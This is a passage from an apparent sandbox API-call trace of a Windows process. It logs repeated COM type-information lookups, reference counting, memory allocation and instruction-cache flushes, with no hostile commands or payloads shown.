ppvObject=0x2047a8*=0x7f72088) returned 0x0 [0045.697] ITypeInfo2:GetTypeKind (in: This=0x7f72088, pTypeKind=0x204804 | out: pTypeKind=0x204804*=5) returned 0x0 [0045.697] IUnknown:Release (This=0x7f72088) returned 0x4 [0045.698] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x2040b0, pDummy=0x0 | out: ppTypeAttr=0x2040b0, pDummy=0x0) returned 0x0 [0045.698] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.698] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72088, ppTypeAttr=0x2040b0, pDummy=0x6 | out: ppTypeAttr=0x2040b0, pDummy=0x6) returned 0x0 [0045.698] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72088) returned 0x0 [0045.698] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.698] IUnknown:Release (This=0x7f72088) returned 0x3 [0045.698] IUnknown:AddRef (This=0x7f72138) returned 0x4 [0045.698] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x2049c8, pDummy=0x0 | out: ppTypeAttr=0x2049c8, pDummy=0x0) returned 0x0 [0045.698] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.698] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.699] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.699] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.699] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.699] GetCurrentProcess () returned 0xffffffffffffffff [0045.699] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.699] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.699] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x203f60, pDummy=0x0 | out: ppTypeAttr=0x203f60, pDummy=0x0) returned 0x0 [0045.699] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.699] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.699] IUnknown:Release (This=0x7f722f0) returned 0x2 [0045.699] IUnknown:AddRef (This=0x7f723a0) returned 0x6 [0045.700] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.700] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c8 | out: ppvObject=0x2047c8*=0x0) returned 0x80004002 [0045.700] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c0 | out: ppvObject=0x2047c0*=0x0) returned 0x80004002 [0045.700] IUnknown:AddRef (This=0x7f723a0) returned 0x6 [0045.700] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x204948, pDummy=0x3b11fc0 | out: ppTypeAttr=0x204948, pDummy=0x3b11fc0*=0x4) returned 0x0 [0045.700] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.700] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.700] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.700] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.700] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.700] GetCurrentProcess () returned 0xffffffffffffffff [0045.700] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.700] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.700] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x203ee0, pDummy=0x0 | out: ppTypeAttr=0x203ee0, pDummy=0x0) returned 0x0 [0045.700] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.701] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.701] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.701] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.701] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204458 | out: ppvObject=0x204458*=0x0) returned 0x80004002 [0045.701] IUnknown:AddRef (This=0x7f7aa08) returned 0x6 [0045.701] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x204450, pDummy=0x10 | out: ppTypeAttr=0x204450, pDummy=0x10) returned 0x0 [0045.701] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.701] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f7aa08, index=0x0, pRefType=0x204448 | out: pRefType=0x204448*=0x3) returned 0x0 [0045.701] ITypeInfo:GetRefTypeInfo (in: This=0x7f7aa08, hreftype=0x3, ppTInfo=0x204460 | out: ppTInfo=0x204460*=0x8137308) returned 0x0 [0045.702] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.702] ITypeInfo:RemoteGetTypeAttr (in: This=0x8137308, ppTypeAttr=0x204450, pDummy=0x204428 | out: ppTypeAttr=0x204450, pDummy=0x204428*=0x3) returned 0x0 [0045.702] ITypeInfo:LocalReleaseTypeAttr (This=0x8137308) returned 0x0 [0045.702] IUnknown:Release (This=0x8137308) returned 0x1 [0045.703] ITypeInfo:RemoteGetDocumentation (in: This=0x7f7aa08, memid=0, refPtrFlags=0x2044d0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0045.703] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Item", cchWideChar=5, lpMultiByteStr=0x2043e0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Item", lpUsedDefaultChar=0x0) returned 5 [0045.703] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Item") returned 0x107ad7 [0045.703] IUnknown:AddRef (This=0x7f7aa08) returned 0x6 [0045.704] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.704] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.704] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2044e8 | out: ppvObject=0x2044e8*=0x0) returned 0x80004002 [0045.704] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2044e0 | out: ppvObject=0x2044e0*=0x0) returned 0x80004002 [0045.704] IUnknown:AddRef (This=0x7f7aa08) returned 0x5 [0045.704] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x204738, pDummy=0x3b12240 | out: ppTypeAttr=0x204738, pDummy=0x3b12240*=0x4) returned 0x0 [0045.704] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.704] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.704] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.704] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.704] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.704] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.704] GetCurrentProcess () returned 0xffffffffffffffff [0045.705] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x54) returned 1 [0045.705] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.705] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x203cd0, pDummy=0x0 | out: ppTypeAttr=0x203cd0, pDummy=0x0) returned 0x0 [0045.705] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.705] IUnknown:Release (This=0x7f7aab8) returned 0x5 [0045.705] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.705] IUnknown:AddRef (This=0x7f7aab8) returned 0x5 [0045.705] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.705] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c8 | out: ppvObject=0x2047c8*=0x0) returned 0x80004002 [0045.705] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c0 | out: ppvObject=0x2047c0*=0x0) returned 0x80004002 [0045.705] IUnknown:AddRef (This=0x7f7aab8) returned 0x5 [0045.706] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x204a18, pDummy=0x3b12540 | out: ppTypeAttr=0x204a18, pDummy=0x3b12540*=0x4) returned 0x0 [0045.706] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.706] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.706] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.706] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.706] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.706] GetCurrentProcess () returned 0xffffffffffffffff [0045.706] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.706] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.706] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x203fb0, pDummy=0x0 | out: ppTypeAttr=0x203fb0, pDummy=0x0) returned 0x0 [0045.706] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.706] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.707] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.707] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.707] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204228 | out: ppvObject=0x204228*=0x0) returned 0x80004002 [0045.707] IUnknown:AddRef (This=0x7f7ab68) returned 0x6 [0045.707] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x204220, pDummy=0x10 | out: ppTypeAttr=0x204220, pDummy=0x10) returned 0x0 [0045.707] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.707] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f7ab68, index=0x0, pRefType=0x204218 | out: pRefType=0x204218*=0x3) returned 0x0 [0045.707] ITypeInfo:GetRefTypeInfo (in: This=0x7f7ab68, hreftype=0x3, ppTInfo=0x204230 | out: ppTInfo=0x204230*=0x8137308) returned 0x0 [0045.707] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.707] ITypeInfo:RemoteGetTypeAttr (in: This=0x8137308, ppTypeAttr=0x204220, pDummy=0x2041f8 | out: ppTypeAttr=0x204220, pDummy=0x2041f8*=0x3) returned 0x0 [0045.707] ITypeInfo:LocalReleaseTypeAttr (This=0x8137308) returned 0x0 [0045.708] IUnknown:Release (This=0x8137308) returned 0x1 [0045.708] ITypeInfo:RemoteGetDocumentation (in: This=0x7f7ab68, memid=0, refPtrFlags=0x2042a0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3ea4440 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3ea4440*="") returned 0x0 [0045.708] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Text", cchWideChar=5, lpMultiByteStr=0x2041b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Text", lpUsedDefaultChar=0x0) returned 5 [0045.708] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text") returned 0x10abed [0045.708] IUnknown:AddRef (This=0x7f7ab68) returned 0x6 [0045.708] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.708] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.708] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2042b8 | out: ppvObject=0x2042b8*=0x0) returned 0x80004002 [0045.708] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2042b0 | out: ppvObject=0x2042b0*=0x0) returned 0x80004002 [0045.709] IUnknown:AddRef (This=0x7f7ab68) returned 0x5 [0045.709] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x204508, pDummy=0x3b127c0 | out: ppTypeAttr=0x204508, pDummy=0x3b127c0*=0x4) returned 0x0 [0045.709] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.709] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.709] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.709] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.709] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.709] GetCurrentProcess () returned 0xffffffffffffffff [0045.709] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.709] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.709] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x203aa0, pDummy=0x0 | out: ppTypeAttr=0x203aa0, pDummy=0x0) returned 0x0 [0045.709] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.709] IUnknown:AddRef (This=0x7f72088) returned 0x4 [0045.709] IUnknown:Release (This=0x7f72088) returned 0x3 [0045.709] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2048e8 | out: ppvObject=0x2048e8*=0x0) returned 0x80004002 [0045.709] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2048e0 | out: ppvObject=0x2048e0*=0x0) returned 0x80004002 [0045.710] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.710] IUnknown:Release (This=0x7f72088) returned 0x3 [0045.710] IUnknown:AddRef (This=0x7f72138) returned 0x4 [0045.710] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.710] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204778 | out: ppvObject=0x204778*=0x0) returned 0x80004002 [0045.710] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204770 | out: ppvObject=0x204770*=0x0) returned 0x80004002 [0045.710] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047b0 | out: ppvObject=0x2047b0*=0x0) returned 0x80004002 [0045.710] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047b8 | out: ppvObject=0x2047b8*=0x0) returned 0x80004002 [0045.710] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee40340f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2047a8 | out: ppvObject=0x2047a8*=0x7f72088) returned 0x0 [0045.710] ITypeInfo2:GetTypeKind (in: This=0x7f72088, pTypeKind=0x204804 | out: pTypeKind=0x204804*=5) returned 0x0 [0045.710] IUnknown:Release (This=0x7f72088) returned 0x4 [0045.711] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x2040b0, pDummy=0x0 | out: ppTypeAttr=0x2040b0, pDummy=0x0) returned 0x0 [0045.711] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.711] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72088, ppTypeAttr=0x2040b0, pDummy=0x6 | out: ppTypeAttr=0x2040b0, pDummy=0x6) returned 0x0 [0045.711] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72088) returned 0x0 [0045.711] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.711] IUnknown:Release (This=0x7f72088) returned 0x3 [0045.711] IUnknown:AddRef (This=0x7f72138) returned 0x4 [0045.711] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x2049c8, pDummy=0x0 | out: ppTypeAttr=0x2049c8, pDummy=0x0) returned 0x0 [0045.711] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.711] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.711] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.711] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.711] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.711] GetCurrentProcess () returned 0xffffffffffffffff [0045.711] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.711] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.711] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x203f60, pDummy=0x0 | out: ppTypeAttr=0x203f60, pDummy=0x0) returned 0x0 [0045.711] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.712] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.712] IUnknown:Release (This=0x7f722f0) returned 0x2 [0045.712] IUnknown:AddRef (This=0x7f723a0) returned 0x6 [0045.712] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.712] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c8 | out: ppvObject=0x2047c8*=0x0) returned 0x80004002 [0045.712] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c0 | out: ppvObject=0x2047c0*=0x0) returned 0x80004002 [0045.712] IUnknown:AddRef (This=0x7f723a0) returned 0x6 [0045.712] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x204948, pDummy=0x3b13360 | out: ppTypeAttr=0x204948, pDummy=0x3b13360*=0x4) returned 0x0 [0045.712] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.712] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.712] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.712] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.712] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.712] GetCurrentProcess () returned 0xffffffffffffffff [0045.712] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.712] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.712] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x203ee0, pDummy=0x0 | out: ppTypeAttr=0x203ee0, pDummy=0x0) returned 0x0 [0045.712] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.712] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.712] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.712] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.712] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204458 | out: ppvObject=0x204458*=0x0) returned 0x80004002 [0045.712] IUnknown:AddRef (This=0x7f7aa08) returned 0x6 [0045.712] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x204450, pDummy=0x10 | out: ppTypeAttr=0x204450, pDummy=0x10) returned 0x0 [0045.712] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.713] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f7aa08, index=0x0, pRefType=0x204448 | out: pRefType=0x204448*=0x3) returned 0x0 [0045.713] ITypeInfo:GetRefTypeInfo (in: This=0x7f7aa08, hreftype=0x3, ppTInfo=0x204460 | out: ppTInfo=0x204460*=0x8137308) returned 0x0 [0045.713] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.713] ITypeInfo:RemoteGetTypeAttr (in: This=0x8137308, ppTypeAttr=0x204450, pDummy=0x204428 | out: ppTypeAttr=0x204450, pDummy=0x204428*=0x3) returned 0x0 [0045.713] ITypeInfo:LocalReleaseTypeAttr (This=0x8137308) returned 0x0 [0045.713] IUnknown:Release (This=0x8137308) returned 0x1 [0045.713] ITypeInfo:RemoteGetDocumentation (in: This=0x7f7aa08, memid=0, refPtrFlags=0x2044d0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0045.713] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Item", cchWideChar=5, lpMultiByteStr=0x2043e0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Item", lpUsedDefaultChar=0x0) returned 5 [0045.713] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Item") returned 0x107ad7 [0045.713] IUnknown:AddRef (This=0x7f7aa08) returned 0x6 [0045.713] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2044e8 | out: ppvObject=0x2044e8*=0x0) returned 0x80004002 [0045.713] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2044e0 | out: ppvObject=0x2044e0*=0x0) returned 0x80004002 [0045.713] IUnknown:AddRef (This=0x7f7aa08) returned 0x5 [0045.713] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x204738, pDummy=0x3b135e0 | out: ppTypeAttr=0x204738, pDummy=0x3b135e0*=0x4) returned 0x0 [0045.713] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.713] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.713] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.713] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.713] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.713] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.713] GetCurrentProcess () returned 0xffffffffffffffff [0045.713] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x54) returned 1 [0045.714] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.714] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x203cd0, pDummy=0x0 | out: ppTypeAttr=0x203cd0, pDummy=0x0) returned 0x0 [0045.714] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.714] IUnknown:Release (This=0x7f7aab8) returned 0x5 [0045.714] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.714] IUnknown:AddRef (This=0x7f7aab8) returned 0x5 [0045.714] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.714] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c8 | out: ppvObject=0x2047c8*=0x0) returned 0x80004002 [0045.714] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c0 | out: ppvObject=0x2047c0*=0x0) returned 0x80004002 [0045.714] IUnknown:AddRef (This=0x7f7aab8) returned 0x5 [0045.714] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x204a18, pDummy=0x3b138e0 | out: ppTypeAttr=0x204a18, pDummy=0x3b138e0*=0x4) returned 0x0 [0045.714] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.714] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.714] 